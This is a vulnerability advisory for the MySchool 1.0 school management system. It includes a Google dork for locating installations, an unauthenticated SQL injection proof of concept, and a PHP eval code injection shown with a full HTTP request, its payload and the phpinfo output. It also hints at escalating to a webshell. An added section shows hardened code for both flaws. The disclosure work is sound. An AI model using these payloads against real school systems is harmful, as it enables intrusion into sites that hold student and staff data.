MySchool 1.0 SQL Injection / Code Injection / XSS / CSRF
2025-2-1 09:40:45 Author: cxsecurity.com (view original) Views: 8


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > MySchool System - Multiple Vulnerabilities
.:. Google Dorks .:. inurl:web/teacher_app
.:. Date: Jan 20, 2025
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://myschool-system.com/
.:. Vendor has been notified and has released patches
.:. Affected Version: 1.0
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
.:. Big thanks to wa-3, Telegram: @wa0_3
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#############
|DESCRIPTION|
#############

"MySchool is a multi-purpose online school management software, an innovative, powerful and easy-to-use interface used by hundreds of educational institutions such as schools, colleges, universities...etc.
- With the passage of time, new technologies occur in managing the educational process, so it is important for educational institutions to manage all the data and work in a professional manner to save both time and money.
- MySchool has been used in many educational institutions in Egypt and the Gulf countries since 2007. We are constantly developing our programs to provide the best solutions and services to our customers. As a company, we are well known to the customers we serve, but we want to go beyond our current customer base to potential customers from schools, colleges and institutes and increase awareness of the MySchool program worldwide.
- My School is the best school management system. We have developed a system that is required by all education systems around the world."
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind, error-based, time-based blind
Path: localhost/forgot_password.php
Vul Parameter: User [POST]

Vulnerable Code:
#################################################################################################
if ($_SERVER['REQUEST_METHOD']== "POST") {
      $Res = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM users where User ='$User' ");
#################################################################################################

Proof of concept:
POST http://localhost/forgot_password.php
User='

Response Error:
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1 in /forgot_password.php:38
Stack trace:
#0 /forgot_password.php(38): mysqli_query()
#1 {main}
thrown in /forgot_password.php on line 38

NOTE: This isn't the only SQLi, there's plenty in the system, I'm too lazy to list them all
Example: /ajax/get_grades.php?schoolId=2'&yearId=24

===========================================================================================

Vulnerability 2: Authenticated Server Side Code Injection - PHP Code Injection
Note: Authentication can be easily acquired from the former SQLi
Path: localhost/btn_01.php
Vul Parameter: Grade_ID [GET]
Vul Parameter2: Subject_ID [GET]
Payload Used: ";phpinfo();$var="
Possible payload for RCE: file_put_contents combined with wget to have a webshell

Vulnerable code:
$data = array($MemberActive, $Year_List_Calc_St, $Sub_Level, $CP_Type, $success, $Division_ID, $Room_ID, $Grade_ID, $Student_Group_ID, $S_User, $Sub_UserID);
return ($data);
if (!$success) {
    if ($MS_Option['cacheEnabled1']) {
        $today = date("Y-m-d");
        $cacheFactor = $today . "-" . $S_UserName . "-" . $Original_User . "-" . $S_Password . "-" . $_SESSION['Sub_Level'];
        $htmlCacheFileName = md5($cacheFactor);
        if (file_exists("cache/login/$htmlCacheFileName")) {
            $fileContent2 = file_get_contents("cache/login/$htmlCacheFileName");
            eval('$xl = ' . $fileContent2 . ';');
        }
    }
}

Proof of concept:
POST https://localhost/btn_01.php?CurrentLine=1&page_no=1&sort=ID&Page_ID=15340&Grade_ID=%22%3Bphpinfo%28%29%3B%24var%3D%22&Subject_ID=&stopEnablePanel=1 HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------56011178726845606972928094726
Content-Length: 555
Origin: https://localhost
Connection: keep-alive
Referer: https://localhost/cp
Cookie: PHP84SESSID=b14675e2e1fecf65008c200e665c743e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------56011178726845606972928094726
Content-Disposition: form-data; name="skipLastVisited"

undefined
-----------------------------56011178726845606972928094726
Content-Disposition: form-data; name="Location_CP_Type"

undefined
-----------------------------56011178726845606972928094726
Content-Disposition: form-data; name="subMenuId"

undefined
-----------------------------56011178726845606972928094726
Content-Disposition: form-data; name="do"

view
-----------------------------56011178726845606972928094726--

Response:
HTTP/1.1 200 OK
Date: Wed, 29 Jan 2025 15:19:00 GMT
Server: Apache
X-Powered-By: PHP/8.4.3
X-XSS-Protection: 0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Upgrade: h2
Connection: Upgrade, Keep-Alive
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Content-Type: text/html; charset=utf-8
content-length: 373447

<title>PHP 8.4.3 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
<table>
<tr class="h"><td>
<a href="https://www.php.net/"><h1 class="p">PHP Version 8.4.3</h1>
</td></tr>
</table>
<table>...

==========================================================================================

There is also CSRF, XSS, External Redirect but I don't see them as a real threat to be honest.
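Added illustration for both findings above; this is not the vendor's patch and not code from the advisory. It shows the two quoted fragments in hardened form: the forgot_password.php user lookup done through a prepared statement with the name bound as a parameter, and the btn_01.php path with Grade_ID and Subject_ID validated as integers and the login cache stored as JSON and read back with json_decode() instead of eval(). The connection variable `$mysqli`, the function names, the users table layout and the JSON cache format are assumptions made for the example.

```php
<?php
// Added example, not MySchool's own code. $mysqli is assumed to be an open
// mysqli connection (the original code reaches it via $GLOBALS["___mysqli_ston"]).
declare(strict_types=1);

// Vulnerability 1: the value of $_POST['User'] is bound as a parameter, so a
// quote character is data for the driver, never part of the SQL text.
function lookup_user_by_name(mysqli $mysqli, string $user): ?array
{
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE User = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $mysqli->error);
    }
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Vulnerability 2 (a): numeric request ids are validated before any use.
// Returns the integer, null when the parameter is absent or empty (the PoC
// sends Subject_ID=), and false when it is present but not a positive integer,
// which is the case for the payload ";phpinfo();$var=".
function validated_id(array $query, string $name): int|false|null
{
    $raw = $query[$name] ?? '';
    if ($raw === '') {
        return null;
    }
    return filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
}

// Vulnerability 2 (b): the cache key mirrors the original md5() scheme but
// leaves the password out of the hashed string (assumption: the cache does not
// need it to stay per-user, since user name and level are already included).
function cache_file_for(string $today, string $userName, string $originalUser, string $subLevel): string
{
    return 'cache/login/' . md5($today . '-' . $userName . '-' . $originalUser . '-' . $subLevel);
}

// The cached data is written as JSON ...
function save_login_cache(string $file, array $xl): void
{
    file_put_contents($file, json_encode($xl, JSON_THROW_ON_ERROR), LOCK_EX);
}

// ... and read back with json_decode(), which parses its input and never
// executes it, so a tampered cache file yields null rather than code execution.
function load_login_cache(string $file): ?array
{
    if (!is_file($file)) {
        return null;
    }
    $decoded = json_decode((string) file_get_contents($file), true);
    return is_array($decoded) ? $decoded : null;
}

// Request handling for btn_01.php with the checks in place: a malformed id is
// rejected with 400 before it can reach any code or query.
$gradeId   = validated_id($_GET, 'Grade_ID');
$subjectId = validated_id($_GET, 'Subject_ID');
if ($gradeId === false || $subjectId === false) {
    http_response_code(400);
    exit('invalid id');
}
```

The same two rules cover the /ajax/get_grades.php example given in the advisory: schoolId and yearId are integers, so they go through validated_id() and are then bound with 'i' placeholders rather than concatenated into the query.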
Source: https://cxsecurity.com/issue/WLB-2025020003